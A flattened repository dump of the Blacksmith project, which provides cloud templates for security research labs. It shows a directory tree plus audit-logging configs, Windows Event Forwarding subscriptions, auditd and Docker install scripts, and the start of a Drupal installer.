├── .gitignore
├── .gitmodules
├── LICENSE
├── README.md
├── resources
├── configs
│ ├── SilkETW
│ │ └── SilkServiceConfig.xml
│ ├── auoms-outconf
│ │ └── syslog.conf
│ ├── auoms-rules
│ │ └── mstic-research.rules
│ ├── bginfo
│ │ ├── OTRWallPaper.bgi
│ │ └── otr.jpg
│ ├── go-audit
│ │ ├── 00-go-audit-config.conf
│ │ └── go-audit.service
│ ├── nxlog
│ │ └── nxlogWEC.conf
│ ├── rpcfirewall
│ │ └── RpcFw.conf
│ ├── syslog
│ │ └── auoms-outconf-syslog.conf
│ ├── sysmon
│ │ ├── linux
│ │ │ ├── sysmon.xml
│ │ │ └── sysmonv1.0.0.xml
│ │ ├── sysmon.xml
│ │ ├── sysmonv11.0.xml
│ │ ├── sysmonv11.11.xml
│ │ ├── sysmonv12.03.xml
│ │ ├── sysmonv13.01.xml
│ │ ├── sysmonv13.10.xml
│ │ ├── sysmonv13.21.xml
│ │ ├── sysmonv13.22.xml
│ │ ├── sysmonv13.30.xml
│ │ ├── sysmonv14.0.xml
│ │ ├── sysmonv14.14.xml
│ │ ├── sysmonv15.0.xml
│ │ └── sysmonv15.15.xml
│ └── wef
│ │ ├── subscriptions.zip
│ │ └── subscriptions
│ │ ├── bits-client.xml
│ │ ├── directory-service.xml
│ │ ├── dns-client.xml
│ │ ├── firewall-advanced-security.xml
│ │ ├── powershell-operational.xml
│ │ ├── powershell.xml
│ │ ├── security.xml
│ │ ├── sysmon.xml
│ │ ├── system.xml
│ │ ├── task-scheduler.xml
│ │ ├── terminal-services.xml
│ │ └── wmi-activity.xml
├── images
│ ├── win10-ad-mxs_01_exchange_admin_center_login.png
│ ├── win10-ad-mxs_02_exchange_admin_center_portal.png
│ ├── win10-ad-mxs_03_owa_login.png
│ ├── win10-ad-mxs_04_owa_new_message.png
│ └── win10-ad-mxs_05_owa_message_received.png
└── scripts
│ ├── bash
│ ├── Install-Auditd.sh
│ ├── Install-C2s.sh
│ ├── Install-Docker.sh
│ ├── Install-Drupal.sh
│ ├── Install-EvilGinx2.sh
│ ├── Install-Logstash.sh
│ ├── Install-OMI.sh
│ ├── Install-OMS-Auditd-Plugin.sh
│ ├── Install-OMS-Linux-Agent.sh
│ ├── Install-PenPot.sh
│ ├── Install-Sysmon-For-Linux.sh
│ └── install-go-audit.sh
│ ├── docker
│ ├── caldera
│ │ ├── 2.6.6-040520
│ │ │ └── docker-compose-caldera.yml
│ │ └── old
│ │ │ ├── Dockerfile
│ │ │ ├── conf
│ │ │ ├── a93f6915-a9b8-4a6b-ad46-c072963b32c1.yml
│ │ │ └── local.yml
│ │ │ └── docker-compose-caldera.yml
│ ├── neo4j
│ │ └── Dockerfile
│ ├── nginx
│ │ ├── Dockerfile
│ │ ├── configs
│ │ │ └── penpot
│ │ └── scripts
│ │ │ └── nginx-entrypoint.sh
│ └── penpot
│ │ └── docker-compose.yaml
│ └── powershell
│ ├── active-directory
│ ├── Add-DomainUsers.ps1
│ ├── Add-GraphPermissions.ps1
│ ├── Configure-AzADConnectSCP.ps1
│ ├── Create-SecurityGroup.ps1
│ ├── Deploy-Forest.ps1
│ ├── Import-GPO.ps1
│ ├── Join-Domain.ps1
│ ├── New-AppRegistration.ps1
│ ├── New-NetworkShares.ps1
│ ├── Set-ADFSFarm.ps1
│ └── Set-OUs.ps1
│ ├── auditing
│ ├── Configure-WEC.ps1
│ ├── Configure-WEF-Client.ps1
│ ├── Enable-PowerShell-Logging.ps1
│ ├── Enable-WinAuditCategories.ps1
│ ├── Set-AuditSAMRemoteCalls.ps1
│ └── Set-SACLs.ps1
│ ├── azure-active-directory
│ ├── Get-DeviceCode.ps1
│ ├── Grant-AzADPermissions.ps1
│ └── New-AzADManagedIdentity.ps1
│ ├── c2
│ ├── Invoke-Manx.ps1
│ └── invoke-sandcat.ps1
│ ├── dsc
│ ├── active-directory
│ │ ├── Create-AD.ps1
│ │ ├── Create-AD.zip
│ │ ├── Install-ADFS.ps1
│ │ ├── Install-ADFS.zip
│ │ ├── Join-Domain.ps1
│ │ ├── Join-Domain.zip
│ │ ├── Prepare-ADFS.ps1
│ │ └── Prepare-ADFS.zip
│ ├── misc
│ │ ├── Enable-TLS12.ps1
│ │ ├── Enable-TLS12.zip
│ │ ├── Import-PfxCert.ps1
│ │ ├── Import-PfxCert.zip
│ │ ├── Install-AADConnect.ps1
│ │ ├── Install-AADConnect.zip
│ │ ├── Install-HyperV.ps1
│ │ └── Install-HyperV.zip
│ ├── ms-exchange
│ │ ├── Install-MSExchange.ps1
│ │ ├── Install-MSExchange.zip
│ │ ├── PostInstall-MSExchange.ps1
│ │ ├── PostInstall-MSExchange.zip
│ │ ├── Prepare-MSExchange.ps1
│ │ ├── Prepare-MSExchange.zip
│ │ ├── PrepareAD-MSExchange.ps1
│ │ └── PrepareAD-MSExchange.zip
│ └── software
│ │ ├── Install-Sysmon.ps1
│ │ └── Install-Sysmon.zip
│ ├── endpoint-software
│ ├── Install-BadBlood.ps1
│ ├── Install-JonMon.ps1
│ ├── Install-LDAPFW.ps1
│ ├── Install-Log-Shipper.ps1
│ ├── Install-PowerAutomate.ps1
│ ├── Install-RE-Tools.ps1
│ ├── Install-RPCFW.ps1
│ ├── Install-SilkETW.ps1
│ └── Install-Sysmon.ps1
│ ├── microsoft365-defender
│ └── Invoke-M365DStreaming.ps1
│ └── misc
│ ├── Add-EvilGinx-Hosts.ps1
│ ├── Configure-PSRemoting.ps1
│ ├── Create-TestScheduledTask.ps1
│ ├── Disarm-Box.ps1
│ ├── Disarm-Firewall.ps1
│ ├── Get-CertSigningReq.ps1
│ ├── Invoke-WMISubscription.ps1
│ ├── Prepare-Box.ps1
│ ├── Register-PADMachine.ps1
│ ├── Rename-Computer.ps1
│ ├── Set-ProxyServer.ps1
│ ├── Set-StaticIP.ps1
│ ├── Set-WallPaper.ps1
│ ├── Update-LocalAdminPWD.ps1
│ └── Update-RemoteTask.ps1
└── templates
└── azure
├── Authorization-Role-Assignments
└── resourceScope.json
├── Azure-Automation-Account
├── AzureAutomationTutorialNew.ps1
└── azuredeploy.json
├── Azure-Bastion-Host
├── README.md
└── azuredeploy.json
├── Azure-CosmosDB-Graph
├── README.md
└── azuredeploy.json
├── Azure-EventHub
├── README.md
├── azuredeploy.json
├── azuredeploy.parameters.json
└── main.bicep
├── Azure-FunctionApp-Win-Pwsh
├── README.md
├── azuredeploy.json
├── funcApp.zip
└── funcApp
│ ├── .funcignore
│ ├── .gitignore
│ ├── .vscode
│ ├── extensions.json
│ ├── launch.json
│ ├── settings.json
│ └── tasks.json
│ ├── Hello
│ ├── function.json
│ ├── run.ps1
│ └── sample.dat
│ ├── host.json
│ ├── profile.ps1
│ └── requirements.psd1
├── Azure-Key-Vault
├── README.md
└── azuredeploy.json
├── Azure-Monitor-Agents
├── README.md
├── linux.json
└── windows.json
├── Azure-Monitor-Data-Collection-Endpoint
├── README.md
└── azuredeploy.json
├── Azure-Monitor-Data-Collection-Rules
├── azuredeploy-2021-09-01-preview.json
├── azuredeploy.json
└── custom-data-ingestion
│ ├── SecurityEvent.json
│ ├── Syslog.json
│ ├── WindowsEvent.json
│ └── allDCRs.json
├── Azure-Monitor-Dependency-Agents
└── azuredeploy.json
├── Azure-Resources-Deployment-Scripts
└── azuredeploy.json
├── Azure-Static-WebApp
└── auredeploy.json
├── CEF-Log-Analytics-Agent
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ └── customScript.json
└── scripts
│ ├── Set-Up-CEF.sh
│ ├── cef_replace.yaml
│ └── cef_simulator.py
├── Linux-C2
├── README.md
└── azuredeploy.json
├── Linux-Drupal
├── README.md
└── azuredeploy.json
├── Linux-EvilGinx2
└── azuredeploy.json
├── Linux
├── README.md
├── azuredeploy.json
├── demos
│ └── linux-201.json
└── nestedtemplates
│ └── customScript.json
├── Log-Analytics-Workspace-Sentinel
├── README.md
├── azuredeploy.json
├── demos
│ └── LA-Sentinel-Windows-Settings.json
├── main.bicep
└── main.json
├── Log-Analytics-Workspace-Solutions
├── README.md
└── azuredeploy.json
├── Log-Analytics-Workspace
├── README.md
├── azuredeploy.json
└── main.bicep
├── Microsoft-Antimalware-Extension-Windows
└── azuredeploy.json
├── Onboard-Endpoints-MDE
└── azuredeploy.json
├── Onboard-Endpoints-MDI
├── azuredeploy.json
└── scripts
│ └── Install-Sensor.ps1
├── Storage-Account-Private-Container
├── README.md
├── azuredeploy.json
└── images
│ ├── AzureDefenderStorage.png
│ └── DiagnosticLogging.png
├── Storage-Account-Queue-Services
├── README.md
└── azuredeploy.json
├── User-Assigned-Managed-Identity
└── azuredeploy.json
├── Virtual-Network-Peerings
├── README.md
└── azuredeploy.json
├── Win-Server-Hybrid-Runbook-Worker
├── README.md
└── azuredeploy.json
├── Win-Server-HyperV
├── README.md
├── azuredeploy.json
├── azuredeploy.parameters.json
└── nestedtemplates
│ └── installHyperV.json
├── Win-Server
├── README.md
├── azuredeploy.json
├── azuredeploy.parameters.json
└── scripts
│ ├── Install-DSC-Modules.ps1
│ └── Set-Initial-Settings.ps1
├── Win10-AD-ADFS
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ ├── importPfxCert.json
│ ├── installADFS.json
│ └── prepareADFS.json
└── scripts
│ ├── Install-DSC-Modules.ps1
│ └── Set-Initial-Settings.ps1
├── Win10-AD-MXS
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ ├── createADForest.json
│ ├── customScriptExtension.json
│ ├── installMSExchange.json
│ ├── postInstallMSExchange.json
│ ├── prepareADMSExchange.json
│ └── prepareMSExchange.json
└── scripts
│ ├── Download-MSExchangeISO.ps1
│ ├── Install-DSC-Modules.ps1
│ └── Set-Initial-Settings.ps1
├── Win10-AD-WEC
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ ├── createADForest.json
│ ├── customScriptExtension.json
│ └── customScriptExtensionArray.json
└── scripts
│ ├── Install-DSC-Modules.ps1
│ └── Set-Initial-Settings.ps1
├── Win10-AD
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ ├── createADForest.json
│ ├── enableTLS12.json
│ ├── installAADConnect.json
│ ├── joinDomain.json
│ └── vnet-dns-server.json
└── scripts
│ ├── Install-DSC-Modules.ps1
│ └── Set-Initial-Settings.ps1
├── Win10-PAN-FW
├── README.md
├── azuredeploy.json
├── nestedtemplates
│ ├── customScript.json
│ └── customScriptExtension.json
└── scripts
│ ├── Set-Initial-Settings.ps1
│ ├── Set-Up-CEF.sh
│ ├── Set-Up-FW.sh
│ └── azure-sample.xml
├── Win10-WDA-EventHub
└── azuredeploy.json
└── Win10
├── README.md
├── azuredeploy.json
├── azuredeploy.parameters.json
├── demos
├── README.md
├── Win10-101.json
├── Win10-201.json
├── Win10-FreshInstall.json
└── Win10-Microsoft-Sentinel.json
├── nestedtemplates
├── customScriptExtension.json
├── customScriptExtensionArray.json
└── sysmonInstall.json
└── scripts
├── Install-DSC-Modules.ps1
└── Set-Initial-Settings.ps1
/.gitignore:
--------------------------------------------------------------------------------
1 |
2 | aws/mordor/.DS_Store
3 | .DS_Store
4 |
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/.gitmodules
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Blacksmith
2 |
3 | [](https://twitter.com/OTR_Community)
4 | [](https://github.com/ellerbrock/open-source-badges/)
5 |
6 | The Blacksmith project focuses on providing dynamic, easy-to-use templates for security researchers to model and provision resources that automatically deploy applications and small networks in the cloud. It currently leverages [AWS CloudFormation](https://aws.amazon.com/cloudformation/) and [Microsoft Azure Resource Manager (ARM)]() templates to implement infrastructure as code for cloud solutions.
7 |
8 | # Goals
9 |
10 | * Expedite research by providing dynamic templates to deploy applications in the cloud.
11 | * Translate favorite applications or tools into cloud templates for developing and testing.
12 | * Replicate research environments for training purposes
13 | * Learn more about AWS CloudFormation
14 | * Learn more about Microsoft's Azure Resource Manager (ARM) templates
15 |
16 | # Getting Started
17 |
18 | * [Blacksmith ReadTheDocs](https://blacksmith.readthedocs.io/en/latest/index.html)
19 |
20 | # Contributing
21 |
22 | We would love to hear your feedback after using the templates in this project. Let me know if you would also like to share an environment or an application with the community. Thank you in advance!
23 |
24 | # License: GPL-3.0
25 |
26 | [Blacksmith's GNU General Public License](https://github.com/OTRF/Blacksmith/blob/master/LICENSE)
--------------------------------------------------------------------------------
/resources/configs/bginfo/OTRWallPaper.bgi:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/configs/bginfo/OTRWallPaper.bgi
--------------------------------------------------------------------------------
/resources/configs/bginfo/otr.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/configs/bginfo/otr.jpg
--------------------------------------------------------------------------------
/resources/configs/go-audit/00-go-audit-config.conf:
--------------------------------------------------------------------------------
# Logstash pipeline for go-audit: read the go-audit log file, parse each
# record as JSON, and write the events to a JSON file whose name is derived
# from the event timestamp.
input {
  file { path => "/var/log/go-audit/go-audit.log" }
}
filter {
  # Parse the 'message' field as JSON (assumes go-audit emits one JSON
  # document per line — confirm against the go-audit output format).
  json { source => "message" }
}
output {
  file {
    # NOTE(review): in the %{+...} date format 'hh' is the 12-hour clock and
    # 'ff' is not a standard pattern letter — confirm the resulting file name
    # is what is intended (HH for 24-hour and SSS for fractions may be meant).
    path => "/var/log/go-audit/json-%{+YYYY-MM-dd-hhmmss.ff}.json"
  }
}
--------------------------------------------------------------------------------
/resources/configs/go-audit/go-audit.service:
--------------------------------------------------------------------------------
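# /etc/systemd/system/go-audit.service
#
# Runs go-audit as a simple foreground service reading its configuration from
# /etc/go-audit.yaml. Conflicts= keeps auditd from running at the same time
# (presumably because both consume the same kernel audit stream — confirm).
[Unit]
Description=go-audit
After=network.target auditd.service
Conflicts=auditd.service

[Service]
Type=simple
ExecStart=/usr/local/bin/go-audit -config /etc/go-audit.yaml
# Without a restart policy a crash of the collector silently ends audit
# coverage until someone notices; bring it back after a short delay.
Restart=on-failure
RestartSec=5s

[Install]
WantedBy=multi-user.target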
--------------------------------------------------------------------------------
/resources/configs/nxlog/nxlogWEC.conf:
--------------------------------------------------------------------------------
1 | Panic Soft
2 | #NoFreeOnExit TRUE
3 |
4 | define ROOT C:\Program Files (x86)\nxlog
5 | define CERTDIR %ROOT%\cert
6 | define CONFDIR %ROOT%\conf
7 | define LOGDIR %ROOT%\data
8 | define LOGFILE %LOGDIR%\nxlog.log
9 | LogFile %LOGFILE%
10 |
11 | Moduledir %ROOT%\modules
12 | CacheDir %ROOT%\data
13 | Pidfile %ROOT%\data\nxlog.pid
14 | SpoolDir %ROOT%\data
15 |
16 |
17 | Module xm_json
18 |
19 |
20 |
21 | Module im_msvistalog
22 | Query \
23 | \
24 | \
25 | \
26 |
27 |
28 | rename_field("ProcessID", "ExecutionProcessID");
29 | if ( $EventID == 4688 )
30 | {
31 | if ($raw_event =~ /Creator\sProcess\s?I[Dd]:\s*\b(0x[0-9a-fA-F]+|[0-9]+)\b\s/) $ProcessId = $1;
32 | }
33 | else
34 | {
35 | if ($raw_event =~ /Process\s?I[Dd]:\s*\b(0x[0-9a-fA-F]+|[0-9]+)\b\s/) $ProcessId = $1;
36 | }
37 | if ( $Channel == "Microsoft-Windows-Sysmon/Operational" )
38 | {
39 | if ( $EventID == 12 OR $EventID == 13 OR $EventID == 14 OR $EventID == 17 OR $EventID == 18 OR $EventID == 19 OR $EventID == 20 OR $EventID == 21 )
40 | rename_field("EventType", "EventTypeOrignal");
41 | if ($raw_event =~ /EventType:\s\b([a-zA-Z]+)\b\s/) $EventType = $1;
42 | }
43 |
44 |
45 |
46 |
52 |
53 |
54 | Path eventlog => logstash
55 |
--------------------------------------------------------------------------------
/resources/configs/rpcfirewall/RpcFw.conf:
--------------------------------------------------------------------------------
1 | fw:uuid:e3514235-4b06-11d1-ab04-00c04fc2dcd2 action:allow audit:true verbose:true
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/configs/wef/subscriptions.zip
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/bits-client.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Bits Client
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-Bits-Client/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/directory-service.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Directory Service
4 | SourceInitiated
5 | Everything from the Directory Service channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/dns-client.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | DNS Client
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-DNS-Client/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/firewall-advanced-security.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Firewall Advanced Security
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-Windows Firewall With Advanced Security/Firewall channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/powershell-operational.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | PowerShell Operational
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-PowerShell/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/powershell.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | PowerShell
4 | SourceInitiated
5 | Everything from the Windows PowerShell channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/security.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Security
4 | SourceInitiated
5 | Everything from the Security channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 | *[System[(EventID='5156')]] and
25 | (*[EventData[Data[@Name="DestAddress"] = "192.168.2.5"]])
26 |
27 |
28 |
29 | ]]>
30 |
31 | true
32 | http
33 | Events
34 |
35 | ForwardedEvents
36 | Microsoft-Windows-EventCollector
37 |
38 |
39 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
40 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/sysmon.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Sysmon
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-Sysmon/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 | *[System[(EventID=5156)]] and ((*[EventData[Data[@Name="DestinationIp"] = "192.168.2.5"]]) or (*[EventData[Data[@Name="Image"] = "\\*\networkwatcheragent.exe"]]) or (*[EventData[Data[@Name="Image"] = "\\*\windowsazureguestagent.exe"]]))
24 |
25 |
26 | ]]>
27 |
28 | true
29 | http
30 | Events
31 |
32 | ForwardedEvents
33 | Microsoft-Windows-EventCollector
34 |
35 |
36 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
37 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/system.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | System
4 | SourceInitiated
5 | Everything from the System channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/task-scheduler.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Task Scheduler
4 | SourceInitiated
5 | Events from the Microsoft-Windows-TaskScheduler/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 |
26 | ]]>
27 |
28 | true
29 | http
30 | Events
31 |
32 | ForwardedEvents
33 | Microsoft-Windows-EventCollector
34 |
35 |
36 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
37 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/terminal-services.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | Terminal Services
4 | SourceInitiated
5 | Everything from a few terminal services channels
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 | ]]>
29 |
30 | true
31 | http
32 | Events
33 |
34 | ForwardedEvents
35 | Microsoft-Windows-EventCollector
36 |
37 |
38 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
39 |
--------------------------------------------------------------------------------
/resources/configs/wef/subscriptions/wmi-activity.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 | WMI Activity
4 | SourceInitiated
5 | Everything from the Microsoft-Windows-WMI-Activity/Operational channel
6 | true
7 | http://schemas.microsoft.com/wbem/wsman/1/windows/EventLog
8 | Custom
9 |
10 |
11 | 1
12 | 100000
13 |
14 |
15 |
16 |
17 |
18 |
19 |
21 |
22 |
23 |
24 |
25 | ]]>
26 |
27 | true
28 | http
29 | Events
30 |
31 | ForwardedEvents
32 | Microsoft-Windows-EventCollector
33 |
34 |
35 | O:NSG:BAD:P(A;;GA;;;DC)(A;;GA;;;DD)S:
36 |
--------------------------------------------------------------------------------
/resources/images/win10-ad-mxs_01_exchange_admin_center_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/images/win10-ad-mxs_01_exchange_admin_center_login.png
--------------------------------------------------------------------------------
/resources/images/win10-ad-mxs_02_exchange_admin_center_portal.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/images/win10-ad-mxs_02_exchange_admin_center_portal.png
--------------------------------------------------------------------------------
/resources/images/win10-ad-mxs_03_owa_login.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/images/win10-ad-mxs_03_owa_login.png
--------------------------------------------------------------------------------
/resources/images/win10-ad-mxs_04_owa_new_message.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/images/win10-ad-mxs_04_owa_new_message.png
--------------------------------------------------------------------------------
/resources/images/win10-ad-mxs_05_owa_message_received.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OTRF/Blacksmith/087d5fa307713e59c817598e941b7cc121f4a282/resources/images/win10-ad-mxs_05_owa_message_received.png
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-Auditd.sh:
--------------------------------------------------------------------------------
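#!/bin/bash

# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0

# Installs auditd and the audispd plugin set. The script is meant to run
# unattended from a provisioning step: without -y apt-get waits for
# confirmation and the run hangs, and DEBIAN_FRONTEND suppresses debconf
# dialogs. The script's exit status is apt-get's.
export DEBIAN_FRONTEND=noninteractive
apt-get install -y auditd audispd-plugins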
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-Docker.sh:
--------------------------------------------------------------------------------
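#!/bin/bash

# Author: Roberto Rodriguez (@Cyb3rWard0g)
# License: GPL-3.0
#
# Installs the Docker engine via Docker's convenience script, makes sure the
# docker service is running, and installs the latest docker-compose release
# binary. Exits with status 1 when the engine install or the service start
# still fails after ten attempts, or when docker-compose cannot be resolved
# or downloaded.

# Removing old docker
if [ -x "$(command -v docker)" ]; then
  echo "Removing docker.."
  apt-get remove -y docker docker-engine docker.io containerd runc
fi

# Clean APT
apt-get clean

# Installing latest Docker
echo 'debconf debconf/frontend select Noninteractive' | debconf-set-selections
echo "Installing docker via convenience script.."
# NOTE(review): get-docker.sh is fetched and executed as root without any
# integrity check. Pin the script to a known revision and verify its digest
# before running it wherever supply-chain tampering is a concern.
curl -fsSL https://get.docker.com -o get-docker.sh
chmod +x get-docker.sh
# Up to ten attempts. The exit happens inside the loop so that a successful
# tenth attempt is not mistaken for exhaustion of the retry budget (the old
# post-loop "count == 10" test did exactly that).
count=1
until ./get-docker.sh; do
  if [ "$count" -ge 10 ]; then
    echo "Docker installation failed after $count attempts." >&2
    exit 1
  fi
  echo "Docker installation failed. Trying again.."
  sleep 5
  ((count++))
done

# Starting Docker service; give it up to ten tries to become active.
count=1
until systemctl --quiet is-active docker.service; do
  if [ "$count" -ge 10 ]; then
    echo "Docker service did not start after $count attempts." >&2
    exit 1
  fi
  echo "Docker is not running. Attempting to start it.."
  systemctl enable docker.service
  systemctl start docker.service
  sleep 5
  ((count++))
done
echo "Docker is running."
docker -v

# ****** Installing latest docker compose
if [ -x "$(command -v docker-compose)" ]; then
  echo "removing docker-compose.."
  rm "$(command -v docker-compose)"
fi

echo "Installing docker-compose.."
# Resolve the latest release tag from the GitHub API. An empty result (rate
# limiting, no network) used to produce a malformed download URL and an error
# page installed as an executable docker-compose; stop instead.
COMPOSE_VERSION=$(curl -fsSL https://api.github.com/repos/docker/compose/releases/latest | grep 'tag_name' | cut -d\" -f4)
if [ -z "$COMPOSE_VERSION" ]; then
  echo "Could not determine the latest docker-compose release." >&2
  exit 1
fi
# -f makes curl fail on HTTP errors rather than saving the error body as the binary.
curl -fL "https://github.com/docker/compose/releases/download/${COMPOSE_VERSION}/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
chmod +x /usr/local/bin/docker-compose
docker-compose -v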
--------------------------------------------------------------------------------
/resources/scripts/bash/Install-Drupal.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
3 | # Author: Roberto Rodriguez (@Cyb3rWard0g)
4 | # License: GPL-3.0
5 |
6 | # *********** log tagging variables ***********
# Prefixes for log lines (ERROR_TAG is the one used on the no-options path).
INFO_TAG='[INSTALLATION-INFO]'
ERROR_TAG='[INSTALLATION-ERROR]'

# *********** Set Log File ***************
# Every installation step below appends its stdout and stderr to this file.
LOGFILE='/var/log/Drupal-Install.log'
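# Print an error line to stderr. All arguments are joined into one message.
# The format string is fixed so that extra arguments are not silently dropped
# and a '%' in the message is not read as a printf conversion (both happened
# when "$@" was spliced into the format). RC/EC are optional colour codes and
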